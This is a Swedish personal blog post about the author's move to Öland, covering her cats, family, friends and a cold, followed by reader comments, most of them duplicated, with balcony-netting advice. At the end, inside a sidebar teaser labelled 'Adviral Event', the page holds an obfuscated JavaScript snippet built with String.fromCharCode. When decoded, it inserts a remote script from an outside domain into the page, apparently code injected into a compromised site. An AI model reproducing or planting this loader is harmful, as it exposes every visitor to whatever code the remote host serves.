Första dagen på Öland. Så gick det…

IMG_7633

Hej fina du!

Älskar den här bilden på Annelie där hon bär vardagsrums borde som en kjol 😍😂 

Första dagen på Öland. Alltså WOW vilken dag!!!! Den har gått i ett! Så mycket känslor, så många minnen. Så många SKRATT 😂 Grannar, stamkunder och bloggläsare har kramat om mig och hälsat mig välkommen ❤️🙏🏻Stannat mig och pratat med mig ☺️

-Finner inga ord❤️

Klockan är nu 02:07 Annelie ligger brevid mig och somnade precis. vi ska sova i ett flyttkaos.

Sture & Stina bor i en klädkammare (några kvadrat) med sina burar, favvo filt och klösbräda. Jag har läst att dom gärna kan/bör vara under mindre och begränsade ytor just under flytt.

Så en fråga till all kattmännisskor, stämmer det? Gör jag rätt? 😽

Lägenheten….. ja, låt mig säga såhär. Vi spar dom detaljerna till ett senare inlägg. 🙈😂

Vi är framme, vi har tömt lastbilen. Vi skulle kommit im kl 08:00 (trodde jag 🙈) Vi kom in kl 13:15. (Suck!) men med facit i hand så gjorde det inget… Annelie kunde då jobba med webbshoppen e N stund, medan Jag la mig och sov två timmar efter frukost. Min förkylningskropp är helt slut. Jag kan ska när som helst och vart som helst. Sista två dagarna innan flytt sov jag 4-6 h mitt på dagen i grannarn Julia & Davis gästrum…

Pappas lastbil…… ja, jag har sjukt mycket grejer. Totalt antal kartonger ska jag räkna efter imorgon. Pappa kommenterade typ att jag hade sex antal sopsäckar med galgar typ fyra gånger 😬😂.  

IMG_9757

Vi har börjat packa ur, sortera och göra gångar mellan kartongerna. Skrattade högt när jag såg Julias kommentar ”mardröm” på kartongen😂

Jag är INTE organiserad vid flytt, verkligen inte! Huller om buller. Vaser insvepta i kläder. Prydnadssaker, blandat med örngott osv. Man kan tycka att jag borde veta bättre. Men ärligt talat så försökte jag förtränga denna flytten in i sista stund…. 🙈

IMG_7647

Min pappa och farbror Lothar har hjälpt till hela dagen🙏🏻 Fiiiiina farbror Lothar. Han har min vovve Tezz. Hon springer lös på hans stora tomt som ligger på landet. 

Kalmar-frun och skogsby-frun har hjälpt till❤️ Vilken känsla att få krama om mina vänner irl, och inte bara genom telefonen.❤️

-Underbara vänner! 😘

Balkongen ligger i söder. Den är stor och generös. MEN jag vill ”näta” in den.

Jag vill att Sture & Stina ska kunna gå ut och in utan att jag behöver oroa mig för att dom hoppar ner och skadar sig. Alltså DEN minnen på övriga när jag började prata om hönsnät och lösningar. 😂🙈. Dom tittade på mig som om jag vore en utomjording?! 

Annelie (inreda.com) är känd som stylist och för sin goda smak vad det gäller inredning. Kalmar-frun gillt inte katter…. överhuvdtaget.  Jag är kraftigt nerröstad. Men kommer fixa det ändå. Helst igår!!! 🤣😃

Ibland går det praktiska före det estetiska😉 Men bara ibland….

just det. Nu höll jag på att glömma. Jag vaknade av att Annelie väckte mig imorse.  Brevid mig på nattduksbordet stod en shot, eller snarare ett glas te. Hon har boostat mig led hennes ”special te”.

Jag, och alla grannarna, och deras familj, samt min pappa har smittats av lilla Pixie. (💖) århundradets förkylning, trött, matt, feber och snorig. Men detta hjäper. Starkt, friskt och med lite bitter-ljuv eftersmak. 🌟👌🏻 Febern borta, tröttheten förtränger jag. 

IMG_7624

Vi har  burit, kämpat och skrattat hysteriskt. Både år det surrealistiska i situationen. (Mer om det senare) Men också av ren glädje.

Vi tog en lunch på Robertos, får jag jobbade som servitris som 18 åring när jag precis flyttat till öland☺️

Min pappa VÄGRAR vara med på bild, och jag ler bestämt och mumlar ”pappa vi har INGA bilder på oss tillsammans som vuxna” Annelie och Lothar brister ut i gapskratt.

Pappa & jag❤️

Ging och Jang (stavas det så???) du fattar, SÅ lika… envisa, och drivande. Men också olika. Motpoler. Älskar min pappa. 

IMG_9711

Vi sov på Skansen igår till idag, och avslutade kvällen med en middagspaus i packningen. 

IMG_9751

Servicen OUTSTANDING när jag ringde 20 min innan köket stängde för att beställa mat tills vi hunnit dit ca 35 min senare 🙏🏻🌟 TACK! För övrigt började jag samtalet med att säga

”Hej, My heter jag… Jo, nu är det såhär jag glömde en tavla på rum 208, ni har möjligtvis inte sett den?”

Alltså jag döööör av skratt åt min förvirring?!😂

Annelie satte upp den ovanför sängen, för att den passare in där. Jag sa, jooooodå, jag kommer ihåg den. Eller inte… dommhade hittat den och ställt in den i receptionen. (TACK & LOV!) 

IMG_7605

Nu snurrar tankarna och jag ville egentligen bara säga hej från Öland. Imorgon kommer Ludvig❤️.

Jag vill hinna så mycket som möjligt innan han kommer. Annelis ska flyga hem till Stockholm med kvälls flyget, då vill jag få så mycket som möjligt innan vi ska vinka ”hej då”  ☺️

Känns så bra att ha henne med mig här nere. Så skönt, så tryggt. Jag är verkligen att hon fått träffa pappa och dom andra🙏🏻

-SÅ TACKSAM✨ 

För tightare uppdateringar kan du följa mig på Instagram @mymartens där jag filmar små snuttar på instastoryn☺️

Nu måste jag sova, klockan ringer tiiiidigt! Imorgon behövs energien, plus att det är DEN stora dagen med stor ät D. Det år exakt ett år sedan jag satte My’s Blommor i konkurs 💔

Kram & Gonatt, sov så gott…

/My Martens

 PS: min EXTREMT suspekta min o hissen handlar om att jag har hiss-skräck och insåg att man låste vrida om nyckeln samtidigt som man åker😳 (Hissen hjälpte verkligen till i flytten) 

-”Menar du den här” IMG_7638 IMG_7642

81 Komentarer

 1. Bra tänk med nät på balkongen. Saken är den att du måste ha det när du har katt och balkongen är ex meter ovanför marken ?
  Men du ska köpa rådjursnät istället för hönsnät. Det är mjukt och de kan inte klättra på det. Köp långa stolpar till hörnen och sätt fast allt med stripes ?

 2. Underbara My : ) Vilket gäng som hjälper dig! Vilka klippor, underbart att ha vänner som dom. Flytten kommer bli bra. Du kommer hitta din plats i livet! Allt har sin tid….
  Ta hand om dig!
  Kram

 3. Håller med syster yster med nät på balkongen, katter älskar att sitta o titta på allt som rör sig. Bra att du har dem i speciellt utrymme för tillfället under röran.
  Lycka till med uppackningen, vet att det är tufft då jag nyligen flyttat till Färjestaden. Det tar tid att få allt på plats.
  Kram tant mumman

  • Hej sara! Skrev mitt i natten… brukar alltid gå in och korta/redigera när jag läst inlägget 2-3 gånger. Men orkade inte… kram /dyslexi My ?

  • Absolut inte HOPPLÖST att läsa…..
   Felet ligger i betraktarens/läsarens öga.
   Det är en fullt begriplig text trots några få och små misstavade ord.
   Fortsätt skriv My, fortsätt berika oss som följer dig i upp och nedgång utan att fördömma dig.

 4. Skönt att höra att du blev så Välkomnad!! Du är nog mer saknad är du trott.??
  Så skönt att höra att du är på plats & att allt gått bra.
  Ser framemot att följa din / Lillemans fortsatta resa.

 5. Skönt att ni är på plats ? Nu kan du sakta börja landa!
  Tänk på att inte jobba ihjäl dig med uppackandet även om du vill att det ska vara fint när sonen kommer så är han ändå gladast att DU finns på plats. ?Kartonger bryr sig inte barn om på samma sätt som vuxna! ?
  All styrka till dig, kan tänka mig att det känns jobbigt med ”årsdagen”, men tänk på vad mkt bra du åstadkommit under året ändå!
  Kram ?

 6. Tips!! Köp kompostgrindar! Dom är jättebra att använda! Säljes 4-p och är stabila. Går i mörk diskret grön färg. Kostar ca 100-130kr för 4-p. Mycket bättre än att krångla upp nät och som sagt är det stabilt och mycket snyggare. Kram smart med hissen förresten! ?

 7. Bra tänk med nät på balkongen. Saken är den att du måste ha det när du har katt och balkongen är ex meter ovanför marken 😉
  Men du ska köpa rådjursnät istället för hönsnät. Det är mjukt och de kan inte klättra på det. Köp långa stolpar till hörnen och sätt fast allt med stripes 😀

 8. Hej My skönt att du är på plats nu. En del av ångesten är placerad. Förstår att det inte är din drömbostad, men du kan göra mycket m färg o inredning,så du får visualisera hur det kan bli på sikt. Det finns säkert goda o gulliga människor där också, som du kan bli trygg med. Det viktigaste kommer ju idag o han vill säkert vara med o ”bestämma”hur ni ska ha det.
  Så lycka till o ge dig själv lite tid. Sigtuna o Stockholm finns kvar o du är så välkommen hit?

 9. Va duktiga ni är på att jobba, du och dina fina vänner. Roligt att hänga med dig i flytten genom dina bilder och berättelser. Detta kommer att bli toppen ska du se. Kram.

 10. Underbara My : ) Vilket gäng som hjälper dig! Vilka klippor, underbart att ha vänner som dom. Flytten kommer bli bra. Du kommer hitta din plats i livet! Allt har sin tid….
  Ta hand om dig!
  Kram

 11. Håller med syster yster med nät på balkongen, katter älskar att sitta o titta på allt som rör sig. Bra att du har dem i speciellt utrymme för tillfället under röran.
  Lycka till med uppackningen, vet att det är tufft då jag nyligen flyttat till Färjestaden. Det tar tid att få allt på plats.
  Kram tant mumman

  • Hej sara! Skrev mitt i natten… brukar alltid gå in och korta/redigera när jag läst inlägget 2-3 gånger. Men orkade inte… kram /dyslexi My 🌸

  • Absolut inte HOPPLÖST att läsa…..
   Felet ligger i betraktarens/läsarens öga.

   Det är en fullt begriplig text trots några få och små misstavade ord.

   Fortsätt skriv My, fortsätt berika oss som följer dig i upp och nedgång utan att fördömma dig.

 12. Skönt att höra att du blev så Välkomnad!! Du är nog mer saknad är du trott.💕💕
  Så skönt att höra att du är på plats & att allt gått bra.
  Ser framemot att följa din / Lillemans fortsatta resa.

 13. Skönt att ni är på plats 😊 Nu kan du sakta börja landa!
  Tänk på att inte jobba ihjäl dig med uppackandet även om du vill att det ska vara fint när sonen kommer så är han ändå gladast att DU finns på plats. 😍Kartonger bryr sig inte barn om på samma sätt som vuxna! 😜
  All styrka till dig, kan tänka mig att det känns jobbigt med ”årsdagen”, men tänk på vad mkt bra du åstadkommit under året ändå!
  Kram 🌸

 14. Tips!! Köp kompostgrindar! Dom är jättebra att använda! Säljes 4-p och är stabila. Går i mörk diskret grön färg. Kostar ca 100-130kr för 4-p. Mycket bättre än att krångla upp nät och som sagt är det stabilt och mycket snyggare. Kram smart med hissen förresten! 🙂

 15. Hej My skönt att du är på plats nu. En del av ångesten är placerad. Förstår att det inte är din drömbostad, men du kan göra mycket m färg o inredning,så du får visualisera hur det kan bli på sikt. Det finns säkert goda o gulliga människor där också, som du kan bli trygg med. Det viktigaste kommer ju idag o han vill säkert vara med o ”bestämma”hur ni ska ha det.
  Så lycka till o ge dig själv lite tid. Sigtuna o Stockholm finns kvar o du är så välkommen hit💗

 16. Va duktiga ni är på att jobba, du och dina fina vänner. Roligt att hänga med dig i flytten genom dina bilder och berättelser. Detta kommer att bli toppen ska du se. Kram.

 17. Hej, kul att se att flytten gått bra.
  Använd absolut inte hönsnät till att näta in, öglorna är utformat så att om en katt försöker klättra kan deras klor fastna och de få svåra skador som följd. Om du vill ha ett metallnät ska du ha ett fyrkantsnät, men det allra bästa, enklaste och minst synliga är ett sk Trixie nät som är just för katter, det är lätt att sätta upp och är väderbeständigt (tycker dock att snöret som medföljer inte tål väder) Finns i olika storlekar och utförande. Lycka till!

 18. När jag såg din tavla över sängen i går så tänkte jag att där står den bra, men hoppas att du inte glömmer den där?.
  Tur att du fick tillbaka den.
  Lycka till med det nya boendet. Jag tror det kommer bli bra när ni har bott in er ett tag. Kram

 19. Hej, kul att se att flytten gått bra.
  Använd absolut inte hönsnät till att näta in, öglorna är utformat så att om en katt försöker klättra kan deras klor fastna och de få svåra skador som följd. Om du vill ha ett metallnät ska du ha ett fyrkantsnät, men det allra bästa, enklaste och minst synliga är ett sk Trixie nät som är just för katter, det är lätt att sätta upp och är väderbeständigt (tycker dock att snöret som medföljer inte tål väder) Finns i olika storlekar och utförande. Lycka till!

  • Anonym!!!
   Rent ut va fan är det för fel på dig? Tror du är en bitter bloggerska eller nått annat ruttet….
   My kul att se ditt o Lillemans nya hem.
   Kram

  • Kära Anonym,
   Med bra hår, händer och tänder kommer man långt i uppförandekodexen. Kan dessutom ta bestick och glas i rätt ordning så är man nästan hemma. Tror nog att My ska kunna fixa till detta.
   Var det något annat specifikt du tänkte på? Om så är fallet får du självklart gärna dela med dig. Om inte – knip igen!

  • Stackars lilla troll som inget bättre har att göra? Hejja My? Läser din blogg varje dag du är en stor inspirationskälla och jag önskar dig all lycka ❤️??

 20. När jag såg din tavla över sängen i går så tänkte jag att där står den bra, men hoppas att du inte glömmer den där😂.
  Tur att du fick tillbaka den.
  Lycka till med det nya boendet. Jag tror det kommer bli bra när ni har bott in er ett tag. Kram

  • Anonym!!!
   Rent ut va fan är det för fel på dig? Tror du är en bitter bloggerska eller nått annat ruttet….
   My kul att se ditt o Lillemans nya hem.
   Kram

  • Kära Anonym,

   Med bra hår, händer och tänder kommer man långt i uppförandekodexen. Kan dessutom ta bestick och glas i rätt ordning så är man nästan hemma. Tror nog att My ska kunna fixa till detta.

   Var det något annat specifikt du tänkte på? Om så är fallet får du självklart gärna dela med dig. Om inte – knip igen!

  • Stackars lilla troll som inget bättre har att göra😂 Hejja My👏 Läser din blogg varje dag du är en stor inspirationskälla och jag önskar dig all lycka ❤️🌸💜

 21. Allt kommer säkert bli bra när du landat och pustat ut efter flytten. Huvudsaken är ju att du har nära till Lilleman nu, och lite kartonger här och där spelar ingen roll, huvudsaken är att du är på plats och att det gått bra. Det finns speciella nät för balkong just för kattägare. Googla bara balkongnät för katt så hittar du flera olika, finns tom i transparent som knappast syns. Lycka till med allt My.
  Kram

 22. Allt kommer säkert bli bra när du landat och pustat ut efter flytten. Huvudsaken är ju att du har nära till Lilleman nu, och lite kartonger här och där spelar ingen roll, huvudsaken är att du är på plats och att det gått bra. Det finns speciella nät för balkong just för kattägare. Googla bara balkongnät för katt så hittar du flera olika, finns tom i transparent som knappast syns. Lycka till med allt My.
  Kram

 23. Vad bra allt ändå verkar ha gått.
  Som du redan fått tips om, inte hönsnät! Beställ nät från tex. zooplus.se
  Ett mjukt som katterna inte kan klättra i. Funkar kanon! Jag köpte tältsnöre från biltema till överkanten istället för det som följer med.
  Förresten, det var jag som köpte överkastet av dig. Det har flyttat till vår stuga och passar jättebra där.

 24. Stort lycka till ? Det här fixar du galant ☺️ Jag hatar att flytta så jag är imponerad på människor som flyttar flera gånger/år (som många måste när dom bor i t ex Sthlm och hyr i andra hand. Jag bor i en mindre stad men nära större städer och har första hands kontrakt..har bott här i ÅTTA år….lär inte flytta på ett tag ? Om jag inte måste såklart) Kram

 25. Vad bra allt ändå verkar ha gått.
  Som du redan fått tips om, inte hönsnät! Beställ nät från tex. zooplus.se
  Ett mjukt som katterna inte kan klättra i. Funkar kanon! Jag köpte tältsnöre från biltema till överkanten istället för det som följer med.
  Förresten, det var jag som köpte överkastet av dig. Det har flyttat till vår stuga och passar jättebra där.

 26. Stort lycka till 🌹 Det här fixar du galant ☺️ Jag hatar att flytta så jag är imponerad på människor som flyttar flera gånger/år (som många måste när dom bor i t ex Sthlm och hyr i andra hand. Jag bor i en mindre stad men nära större städer och har första hands kontrakt..har bott här i ÅTTA år….lär inte flytta på ett tag 😅 Om jag inte måste såklart) Kram

 27. Lycka till My med allt?
  Katterna på balkong, googla så du får rätt nät mm. så kommer dina katter att få det ljuvligt?

 28. Lycka till My med allt💐
  Katterna på balkong, googla så du får rätt nät mm. så kommer dina katter att få det ljuvligt🐱

 29. Konstigt, det kommer alltid nån, alltid. Varför?Jag begriper inte. I typ varenda blogg är det någon, och det måste ju vara samma person(er). Ni som mår så dåligt som ni gör, vet ni om det? Snälla, gå och prata med nån. Ni får ett mycket bättre liv om ni inte bara sitter hemma och är elaka. Börja med att försök skriv nått snällt. Skriv bara HEJ, Det räcker till att börja med. Försök. Kram på er.
  My, det blir bra. Ska bli kul att få se lägenheten sen. Ser ju ut som ett fint ställe det lilla man ser.

 30. Konstigt, det kommer alltid nån, alltid. Varför?Jag begriper inte. I typ varenda blogg är det någon, och det måste ju vara samma person(er). Ni som mår så dåligt som ni gör, vet ni om det? Snälla, gå och prata med nån. Ni får ett mycket bättre liv om ni inte bara sitter hemma och är elaka. Börja med att försök skriv nått snällt. Skriv bara HEJ, Det räcker till att börja med. Försök. Kram på er.
  My, det blir bra. Ska bli kul att få se lägenheten sen. Ser ju ut som ett fint ställe det lilla man ser.

 31. Snälla ni tex Sara, Anonym? Kan My få installera sig i lägenheten innan ni börjar gnälla
  Fina My bry dig inte om de som klagar, de har väl inget vettigt att göra. Hoppas att Ludwig o du har d mysigt o att du trivs i din nya lya❤️ Kramiz❤️

 32. Snälla ni tex Sara, Anonym? Kan My få installera sig i lägenheten innan ni börjar gnälla
  Fina My bry dig inte om de som klagar, de har väl inget vettigt att göra. Hoppas att Ludwig o du har d mysigt o att du trivs i din nya lya❤️ Kramiz❤️

 33. Hade jag bott nära hade jag kommit med flyttgröt och vin men nu kommer det via cyber? lycka till det blir vad du gör det till, tänk positivt så ordnar det sig mycket, bamsekram

 34. Hade jag bott nära hade jag kommit med flyttgröt och vin men nu kommer det via cyber😃 lycka till det blir vad du gör det till, tänk positivt så ordnar det sig mycket, bamsekram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/